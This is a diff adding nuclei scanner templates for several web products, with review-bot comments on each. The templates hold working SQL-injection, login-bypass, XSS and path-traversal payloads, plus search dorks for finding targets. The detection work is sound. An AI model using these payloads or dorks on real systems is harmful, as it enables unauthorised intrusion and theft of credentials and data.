@@ -0,0 +1,31 @@ +id: applezeed-sqli + +info: + name: Applezeed - SQL Injection + author: r3Y3r53 + severity: high + description: | + Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database + reference: + - https://cxsecurity.com/issue/WLB-2019120057 + metadata: + google-query: intext:"Power BY applezeed.com" + verified: true + max-request: 1 + tags: sqli,unauth,applezeed + +http: + - raw: + - | + @timeout: 15s + GET /travel-detail.php?id=1%27AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))bAKL)%20AND%20%27vRxe%27=%27vRxe HTTP/2 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains(content_type, "text/html")' + - 'contains(body, "applezeed")' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/other/beyond-trust-xss.yaml b/http/vulnerabilities/other/beyond-trust-xss.yaml new file mode 100644 index 0000000000..f2adae2a55 --- /dev/null +++ b/http/vulnerabilities/other/beyond-trust-xss.yaml 
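Review bot: The description names `travel-details.php?id=` but the request targets `/travel-detail.php`, so one of the two is wrong; align them with the referenced advisory. The raw request is declared `HTTP/2` while the other raw templates use `HTTP/1.1`; unless HTTP/2 is required here, using the same version keeps the batch consistent and avoids depending on the client's HTTP/2 support.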
@@ -0,0 +1,29 @@ +id: beyond-trust-xss + +info: + name: BeyondTrust Remote Support 6.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint. + reference: + - https://www.exploit-db.com/exploits/50632 + metadata: + max-request: 1 + verified: true + shodan-query: html:"BeyondTrust" + google-query: intext:"BeyondTrust" "Redistribution Prohibited" + tags: beyondtrust,xss + +http: + - method: GET + path: + - "{{BaseURL}}/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "") && contains(body, "beyondtrust")' + condition: and diff --git a/http/vulnerabilities/other/csz-cms-sqli.yaml b/http/vulnerabilities/other/csz-cms-sqli.yaml new file mode 100644 index 0000000000..04f0aebbf5 --- /dev/null +++ b/http/vulnerabilities/other/csz-cms-sqli.yaml 
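Review bot: As shown, `contains(body, "")` is always true, so the third dsl line reduces to `contains(body, "beyondtrust")` and the template would fire on any BeyondTrust login page regardless of reflection. If the probe string was stripped when this page was rendered, ignore this; otherwise the matcher should assert the reflected, unescaped probe. The description also has a typo, `acheive` → `achieve`.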
@@ -0,0 +1,28 @@ +id: csz-cms-sqli + +info: + name: CSZ CMS 1.3.0 - SQL Injection + author: r3Y3r53 + severity: high + description: | + CSZ CMS version 1.3.0 suffers from multiple remote blind SQL injection vulnerabilities. + reference: + - https://packetstormsecurity.com/files/167028/CSZ-CMS-1.3.0-SQL-Injection.html + metadata: + verified: true + tags: sqli,csz,cms + +http: + - raw: + - | + @timeout: 20s + GET /csz-cms/plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "CSZ CMS")' + condition: and diff --git a/http/vulnerabilities/other/doorgets-info-disclosure.yaml b/http/vulnerabilities/other/doorgets-info-disclosure.yaml new file mode 100644 index 0000000000..9fe05839e9 --- /dev/null +++ b/http/vulnerabilities/other/doorgets-info-disclosure.yaml @@ -0,0 +1,39 @@ +id: doorgets-info-disclosure + +info: + name: DoorGets CMS v7.0 - Information Disclosure + author: r3Y3r53 + severity: high + description: | + doorGets 7.0 has a sensitive information disclosure vulnerability in /setup/temp/admin.php. A remote unauthenticated attacker could exploit this vulnerability to obtain administrator's password. + reference: + - https://packetstormsecurity.com/files/174236/DoorGets-CMS-7.0-Information-Disclosure.html + - https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory + metadata: + google-dork: "Powered with doorGets ™" + verified: true + max-request: 1 + tags: doorgets,cms,packetstorm,disclosure + +http: + - method: GET + path: + - "{{BaseURL}}/v12/setup/temp/admin.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ':"email";' + - ':"password";' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 
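Review bot: In csz-cms-sqli the query starts with `p=3D1%27`, where `3D` looks like quoted-printable residue (`=3D` is `=`) copied from the advisory mail, so the parameter value sent is not the one the advisory describes; verify against the reference and drop the `3D` if so. That template's metadata also lacks `max-request: 1`. In doorgets-info-disclosure the path hard-codes a `/v12/` prefix while the description says `/setup/temp/admin.php`, so the template misses default installs; the description should explain the prefix or the path should match it, and the `google-dork` key should be `google-query` for consistency with the other templates in this batch.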
diff --git a/http/vulnerabilities/other/ep-web-cms-xss.yaml b/http/vulnerabilities/other/ep-web-cms-xss.yaml new file mode 100644 index 0000000000..f2481f5dee --- /dev/null +++ b/http/vulnerabilities/other/ep-web-cms-xss.yaml @@ -0,0 +1,33 @@ +id: ep-web-cms-xss + +info: + name: EP Web Solutions CMS - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross-site scripting is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. + reference: + - https://www.exploitalert.com/view-details.html?id=36197 + - https://cxsecurity.com/ascii/WLB-2020090139 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + google-query: intext:"EPweb " || intext:" Evergreen Park Web" + verified: true + max-request: 1 + tags: xss,epweb,unauth,cms + +http: + - method: GET + path: + - "{{BaseURL}}/shop.php?search=%22/%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "/>") && contains(body, "EPweb")' + condition: and diff --git a/http/vulnerabilities/other/erensoft-sqli.yaml b/http/vulnerabilities/other/erensoft-sqli.yaml new file mode 100644 index 0000000000..0865696a5d --- /dev/null +++ b/http/vulnerabilities/other/erensoft-sqli.yaml 
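Review bot: As shown, `contains(body, "/>")` matches essentially any HTML document, so the third dsl line effectively only checks for `EPweb`; if the probe string was stripped when this page was rendered, ignore this, otherwise assert the full reflected probe. The description is a generic definition of XSS and does not say where the issue is; a sentence such as `The search parameter of shop.php is reflected unescaped.` would make the template self-describing.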
@@ -0,0 +1,31 @@ +id: erensoft-sqli + +info: + name: ErenSoft - SQL Injection + author: r3Y3r53 + severity: high + description: | + SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries. + reference: + - https://cxsecurity.com/issue/WLB-2023070055 + metadata: + google-query: intext:"Kodlama:Erensoft" + verified: true + max-request: 1 + tags: sqli,unauth,erensoft + +http: + - raw: + - | + GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html") && contains(body, "videoseyret")' + condition: and diff --git a/http/vulnerabilities/other/groomify-sqli.yaml b/http/vulnerabilities/other/groomify-sqli.yaml new file mode 100644 index 0000000000..117892bb47 --- /dev/null +++ b/http/vulnerabilities/other/groomify-sqli.yaml 
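Review bot: The description is circular (`SQL Injection is a type of SQL injection attack`) and never names the affected endpoint; it should state that the `id` parameter of `videoseyret.php` is used unsanitised in a query, as the request implies. The raw request also carries a full browser `User-Agent` and `Accept` header, which no other template in this batch does; if the target only triggers with those headers, say so in a comment, otherwise drop them so the request stays minimal.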
@@ -0,0 +1,32 @@ +id: groomify-sqli + +info: + name: Groomify v1.0 - SQL Injection Vulnerability + author: theamanrawat + severity: high + description: | + An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. + reference: + - https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114# + - https://vulners.com/zdt/1337DAY-ID-38799 + metadata: + verified: "true" + max-request: 1 + tags: sqli,groomify,unauth + +http: + - raw: + - | + @timeout: 25s + GET /blog-search?search=deneme%27%20AND%20(SELECT%201642%20FROM%20(SELECT(SLEEP(6)))Xppf)%20AND%20%27rszk%27=%27rszk HTTP/2 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "text/html") + - contains(body, 'value=\"deneme') + condition: and diff --git a/http/vulnerabilities/other/gz-forum-script-xss.yaml b/http/vulnerabilities/other/gz-forum-script-xss.yaml new file mode 100644 index 0000000000..b848ad6e25 --- /dev/null +++ b/http/vulnerabilities/other/gz-forum-script-xss.yaml 
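Review bot: The description was copied from a different template — it talks about Webkul QloApps and the `date_from`/`date_to`/`id_product` parameters, while this template targets Groomify's `/blog-search?search=` parameter; rewrite it to describe the time-based injection in `search`. `verified: "true"` is a quoted string whereas every sibling uses the boolean `true`, and `matchers-condition: and` is meaningless with a single matcher. The trailing `#` on the first reference URL looks accidental.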
@@ -0,0 +1,28 @@ +id: gz-forum-script-xss + +info: + name: GZ Forum Script 1.8 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. + reference: + - https://www.exploit-db.com/exploits/51559 + - https://gzscripts.com/gz-forum-script.html + metadata: + verified: true + max-request: 1 + tags: gzforum,xss,unauth + +http: + - method: GET + path: + - "{{BaseURL}}preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, ">") && contains(body, "New Topic")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/vulnerabilities/other/indonasia-toko-cms-sql.yaml b/http/vulnerabilities/other/indonasia-toko-cms-sql.yaml new file mode 100644 index 0000000000..cfe6f5786d --- /dev/null +++ b/http/vulnerabilities/other/indonasia-toko-cms-sql.yaml 
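Review bot: The path is `{{BaseURL}}preview.php...` with no `/` after `{{BaseURL}}`, so for a target like `https://host` the request goes to `https://hostpreview.php` and the template can never match; change it to `"{{BaseURL}}/preview.php?controller=Load&action=index&catid=..."`. As shown, `contains(body, ">")` is also near-unconditional; if that is a rendering artifact of this page ignore it, otherwise assert the reflected probe.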
@@ -0,0 +1,35 @@ +id: indonasia-toko-cms-sql + +info: + name: Indonasia Toko CMS - SQL Injection + author: r3Y3r53 + severity: high + description: | + Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code. + reference: + - https://cxsecurity.com/issue/WLB-2019030008 + metadata: + max-request: 1 + verified: true + google-query: inurl:"index.php?mnu=login" + tags: sqli,toko,cms + +http: + - raw: + - | + POST /index.php?mnu=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert('Administrator" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/joomla-jlex-review-xss.yaml b/http/vulnerabilities/other/joomla-jlex-review-xss.yaml new file mode 100644 index 0000000000..a334683cde --- /dev/null +++ b/http/vulnerabilities/other/joomla-jlex-review-xss.yaml 
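Review bot: The id, name and tag spell the product `Indonasia`/`toko` while the description says `Indonesia Toko CMS`; pick one spelling so the template is findable by tag. Since this is an authentication-bypass via SQL injection, the tags should also carry `auth-bypass` (and `unauth`) as the sound4 templates in this batch do, so it is grouped with the same class of finding.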
@@ -0,0 +1,35 @@ +id: joomla-jlex-xss + +info: + name: Joomla JLex Review 6.0.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://www.exploitalert.com/view-details.html?id=39732 + - https://www.exploit-db.com/exploits/51645 + - https://extensions.joomla.org/extension/jlex-review/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1950415971 + tags: joomla,xss + +http: + - method: GET + path: + - "{{BaseURL}}/?review_id=1&itwed%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '")' + condition: and diff --git a/http/vulnerabilities/other/lokomedia-cms-lfi.yaml b/http/vulnerabilities/other/lokomedia-cms-lfi.yaml new file mode 100644 index 0000000000..f4019e490a --- /dev/null +++ b/http/vulnerabilities/other/lokomedia-cms-lfi.yaml 
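Review bot: As shown, the body matcher contains a single fragment `")` with `condition: and`, which almost any page satisfies; if the full reflected string was stripped when this page was rendered, ignore this, otherwise the words list should hold the unescaped `onmouseover="confirm(document.domain)"style=` probe. Given `matchers-condition: and`, a header `text/html` and a `status` 200 matcher as in the sibling solidres template would also tighten it.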
@@ -0,0 +1,36 @@ +id: lokomedia-cms-lfi + +info: + name: Lokomedia CMS - LFI Vulnerability + author: r3Y3r53 + severity: high + description: A Local File Inclusion (LFI) vulnerability is a type of security vulnerability that occurs when a web application allows an attacker to include files on the server that should not be accessible. + reference: + - https://cxsecurity.com/issue/WLB-2018070116 + - https://github.com/kangkuswae/CMS-Lokomedia + metadata: + google-query: inurl:/semua-download.html + verified: true + max-request: 1 + tags: lfi,lokomedia,cms + +http: + - method: GET + path: + - "{{BaseURL}}/downlot.php?file=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/proses" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/news-script-xss.yaml b/http/vulnerabilities/other/news-script-xss.yaml new file mode 100644 index 0000000000..021ce6dd03 --- /dev/null +++ b/http/vulnerabilities/other/news-script-xss.yaml @@ -0,0 +1,26 @@ +id: news-script-xss + +info: + name: News Script Pro 2.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://www.exploitalert.com/view-details.html?id=39634 + metadata: + verified: true + tags: newsscript,xss + +http: + - method: GET + path: + - "{{BaseURL}}/preview.php/mn71q%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ep15vr?cat_id=&p=2" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "News Script PHP Pro", "")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and 
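Review bot: The lokomedia description is a generic definition of LFI and never says that the `file` parameter of `downlot.php` is the affected input, which the request shows; state that instead. The header match on `application/proses` is unusual — if that is genuinely the content type the application emits, a comment saying so would stop a future maintainer from "fixing" it. In news-script-xss, `metadata` lacks `max-request: 1`, and as shown `contains_all(body, "News Script PHP Pro", "")` carries an empty string; if the probe was stripped when this page was rendered ignore that, otherwise put the reflected probe there.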
diff --git a/http/vulnerabilities/other/office-suite-xss.yaml b/http/vulnerabilities/other/office-suite-xss.yaml new file mode 100644 index 0000000000..b8488c3d23 --- /dev/null +++ b/http/vulnerabilities/other/office-suite-xss.yaml @@ -0,0 +1,27 @@ +id: office-suite-xss + +info: + name: Office Suite Premium < 10.9.1.42602 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Office Suite is suffering from an XSS vulnerability in the following parameter /api?path=files&id. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. + reference: + - https://www.exploitalert.com/view-details.html?id=39632 + metadata: + max-request: 1 + verified: true + tags: xss,office,suite + +http: + - method: GET + path: + - "{{BaseURL}}/api?path=files&id=dfsse%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "", "\"payload\":")' + condition: and diff --git a/http/vulnerabilities/other/ozeki-10-sms-gateway.yaml b/http/vulnerabilities/other/ozeki-10-sms-gateway.yaml new file mode 100644 index 0000000000..c26d3e1483 --- /dev/null +++ b/http/vulnerabilities/other/ozeki-10-sms-gateway.yaml 
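Review bot: The path embeds a fixed `expires=1687785968527` timestamp; if the server validates that value the request will be rejected on every run after that date and the template will silently report nothing, so either document that the parameter is not checked or generate it (nuclei exposes `{{unix_time()}}`-style helpers). As shown, `contains_all(body, "", "\"payload\":")` carries an empty string; if the probe was stripped when this page was rendered ignore this, otherwise assert the reflected probe.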
@@ -0,0 +1,27 @@ +id: ozeki-10-sms-gateway + +info: + name: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read + author: r3Y3r53 + severity: high + description: | + An arbitrary file read vulnerability, also known as a "path traversal" or "directory traversal" vulnerability, occurs when an attacker is able to access files on a system that they shouldn't have access to. This vulnerability arises from improper input validation or insufficient access controls in an application. + reference: + - https://www.exploit-db.com/exploits/51646 + - https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip + metadata: + verified: true + max-request: 1 + tags: ozeki,lfi,unauth,ozeki + +http: + - method: GET + path: + - "{{BaseURL}}/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "application/octet-stream") && contains(body, "Mail") && contains(body, "files")' + condition: and diff --git a/http/vulnerabilities/other/phuket-cms-sqli.yaml b/http/vulnerabilities/other/phuket-cms-sqli.yaml new file mode 100644 index 0000000000..eeb898f0e7 --- /dev/null +++ b/http/vulnerabilities/other/phuket-cms-sqli.yaml 
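Review bot: `tags` lists `ozeki` twice (`ozeki,lfi,unauth,ozeki`); drop the duplicate. The body check on bare `Mail` and `files` is loose for a win.ini read — the file's section headers are bracketed, so `[Mail]` and `[files]` (or `for 16-bit app support`) would cut false positives without changing what is tested. The description is a generic definition of path traversal and should instead say that the double-encoded traversal in the request path is served as `application/octet-stream`.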
@@ -0,0 +1,33 @@ +id: phuket-cms-sqli + +info: + name: Phuket Solution CMS - SQL Injection + author: r3Y3r53 + severity: high + description: | + Phuket Solutions CMS is vulnerable to sql injection in which an attacker is able to manipulate an SQL query through user input, causing the application to execute unintended SQL code. + reference: + - https://www.exploitalert.com/view-details.html?id=36234 + metadata: + max-request: 2 + google-dork: intext:"Developed by Phuket Solution" + verified: true + tags: phuket,sqli,phuket-cms + +http: + - raw: + - | + GET /properties-list.php HTTP/1.1 + Host: {{Hostname}} + + - | + GET /properties-list.php?property-types=%27 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "You have an error in your SQL syntax") && contains(body_1, "Phuket Solution")' + condition: and diff --git a/http/vulnerabilities/other/phuket-cms-xss.yaml b/http/vulnerabilities/other/phuket-cms-xss.yaml new file mode 100644 index 0000000000..4f648b6bc8 --- /dev/null +++ b/http/vulnerabilities/other/phuket-cms-xss.yaml 
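Review bot: The metadata key `google-dork` differs from the `google-query` key used by the other templates in this batch, so tooling that indexes on that key will skip this one; rename it. The matcher is otherwise sound: it checks the MySQL error text in the second response and the product marker in the first, so a stray error page on an unrelated site will not fire it.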
@@ -0,0 +1,32 @@ +id: phuket-cms-xss + +info: + name: Phuket Solution CMS - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Phuket Solutions CMS is vulnerable to Reflected XSS in which an attacker injects malicious executable scripts into the code of a trusted application or website. + reference: + - https://www.exploitalert.com/view-details.html?id=36234 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + google-query: intext:"Developed by Phuket Solution" + verified: true + tags: xss,phuket,phuket-cms + +http: + - raw: + - | + GET /properties-list.php?property-types=1&types=2&location=&prices=&bedroom=&code=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "") && contains(body, "Phuket Solution")' + condition: and diff --git a/http/vulnerabilities/other/pmb-sqli.yaml b/http/vulnerabilities/other/pmb-sqli.yaml new file mode 100644 index 0000000000..2912f7848c --- /dev/null +++ b/http/vulnerabilities/other/pmb-sqli.yaml 
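Review bot: `metadata` lacks the `max-request: 1` field that the sibling phuket-cms-sqli template carries. As shown, `contains(body, "")` is always true, so the matcher effectively only checks for `Phuket Solution` on a 200 HTML page; if the probe was stripped when this page was rendered ignore this, otherwise the line should assert the reflected, unescaped probe.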
@@ -0,0 +1,32 @@ +id: pmb-sqli + +info: + name: PMB <= 7.4.6 - SQL Injection + author: r3Y3r53 + severity: high + description: | + PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs. + reference: + - https://www.exploit-db.com/exploits/51197 + - https://vulners.com/exploitdb/EDB-ID:51197 + metadata: + google-query: inurl:"opac_css" + verified: true + max-request: 1 + tags: sqli,unauth,pmb + +http: + - raw: + - | + @timeout: 15s + GET /pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined HTTP/2 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type, "text/html")' + - 'contains(header, "PmbOpac")' + - 'duration>=5' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/other/rentequip-xss.yaml b/http/vulnerabilities/other/rentequip-xss.yaml new file mode 100644 index 0000000000..f010a8c841 --- /dev/null +++ b/http/vulnerabilities/other/rentequip-xss.yaml 
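Review bot: The description is product marketing copy about PMB and librarians and says nothing about the vulnerability; replace it with a sentence like `The id parameter of opac_css/ajax.php is used unsanitised in a SQL query, allowing time-based blind injection.` The raw request is also `HTTP/2` while most raw requests in this batch are `HTTP/1.1`; unless required, keep it consistent.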
@@ -0,0 +1,29 @@ +id: rentequip-xss + +info: + name: RentEquip Multipurpose Rental 1.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://vulners.com/packetstorm/PACKETSTORM:173002 + - https://www.exploitalert.com/view-details.html?id=39611 + - https://codecanyon.net/user/kreativdev/portfolio + metadata: + verified: true + max-request: 1 + tags: xss,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/shop/products?category=cordless-tools&min=1026553%3balert(document.domain)%2f%2f772" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "rentequip") && contains(body, "1026553;alert(document.domain)//772")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/vulnerabilities/other/shoowbiz-xss.yaml b/http/vulnerabilities/other/shoowbiz-xss.yaml new file mode 100644 index 0000000000..becb51abb6 --- /dev/null +++ b/http/vulnerabilities/other/shoowbiz-xss.yaml 
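Review bot: `tags` is just `xss,unauth` with no product tag, unlike every other template here, so the finding cannot be selected by product; add `rentequip`. The matcher, which asserts the exact reflected string `1026553;alert(document.domain)//772` alongside the product marker, is the strongest in this batch and a good model for the other XSS templates.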
@@ -0,0 +1,28 @@ +id: shoowbiz-xss +info: + name: SHOOWBIZ - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross-Site Scripting, is a type of security vulnerability commonly found in web applications. It occurs when an attacker injects malicious scripts (typically written in JavaScript) into web pages viewed by other users. + reference: + - https://www.exploitalert.com/view-details.html?id=36000 + metadata: + max-request: 1 + verified: true + google-drok: inurl:"search.php?q=" + tags: shoowbiz,xss + +http: + - method: GET + path: + - "{{BaseURL}}/search.php?q=%3CScRipT%3Ealert(document.domain);%3C/ScRipT%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "Search result in")' + condition: and diff --git a/http/vulnerabilities/other/sound4-impact-auth-bypass.yaml b/http/vulnerabilities/other/sound4-impact-auth-bypass.yaml new file mode 100644 index 0000000000..94c1bdf7d2 --- /dev/null +++ b/http/vulnerabilities/other/sound4-impact-auth-bypass.yaml 
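Review bot: The metadata key is misspelled `google-drok`; it should be `google-query` as in the sibling templates. As shown, `contains(body, "")` is always true, so only `Search result in` is actually checked; if the probe was stripped when this page was rendered ignore this, otherwise assert the reflected probe. The file also lacks the blank line between `id` and `info` that the other templates keep.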
@@ -0,0 +1,33 @@ +id: sound4-impact-auth-bypass + +info: + name: SOUND4 IMPACT/FIRST/PULSE/Eco <= 2.x - Authentication Bypass + author: r3Y3r53 + severity: high + description: | + The application suffers from an SQL Injection vulnerability. Input passed through the 'username' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php + metadata: + verified: true + shodan-query: http.favicon.hash:-1548359600 + tags: sqli,zeroscience,sound4,auth-bypass + +http: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%27%2Bjoxvy--%2Bz&password=ffesdf + + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "Network Diagnostic:", "disconnect the user")' + condition: and diff --git a/http/vulnerabilities/other/sound4-impact-password-auth-bypass.yaml b/http/vulnerabilities/other/sound4-impact-password-auth-bypass.yaml new file mode 100644 index 0000000000..8794745e15 --- /dev/null +++ b/http/vulnerabilities/other/sound4-impact-password-auth-bypass.yaml 
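Review bot: This template uses `redirects: true` while its sibling sound4-password-auth-bypass uses `host-redirects: true` for the same flow; pick one so both behave identically after the login redirect (`host-redirects` is the more restrictive and the one used elsewhere in this batch). `metadata` also lacks `max-request: 1`.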
@@ -0,0 +1,35 @@ +id: sound4-password-auth-bypass + +info: + name: Sound4 IMPACT/FIRST/PULSE/Eco <=2.x - Authentication Bypass + author: r3Y3r53 + severity: high + description: | + The application suffers from an SQL Injection vulnerability. Input passed through the 'password' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"SOUND4" + tags: sound4,auth-bypass,sqli,misconfig + +http: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=test&password=%27%2Bjoxy--%2Bz + + host-redirects: true + max-redirects: 2 + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(body, "SOUND4 PULSE", "Network Diagnostic", "Disconnect")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/other/stackposts-sqli.yaml b/http/vulnerabilities/other/stackposts-sqli.yaml new file mode 100644 index 0000000000..2bd630bda7 --- /dev/null +++ b/http/vulnerabilities/other/stackposts-sqli.yaml 
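Review bot: `contains(body, "SOUND4 PULSE", "Network Diagnostic", "Disconnect")` passes four arguments to nuclei's two-argument `contains` DSL helper, so the expression fails to compile and the template can never match; the intended form is `contains_all(body, "SOUND4 PULSE", "Network Diagnostic", "Disconnect")`. Requiring the literal `SOUND4 PULSE` also limits detection to the PULSE product even though the name covers IMPACT/FIRST/Eco, whereas the username-parameter sibling matches on `"Network Diagnostic:", "disconnect the user"` — aligning the two would give consistent coverage. The `misconfig` tag does not describe an SQL-injection authentication bypass and can be dropped.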
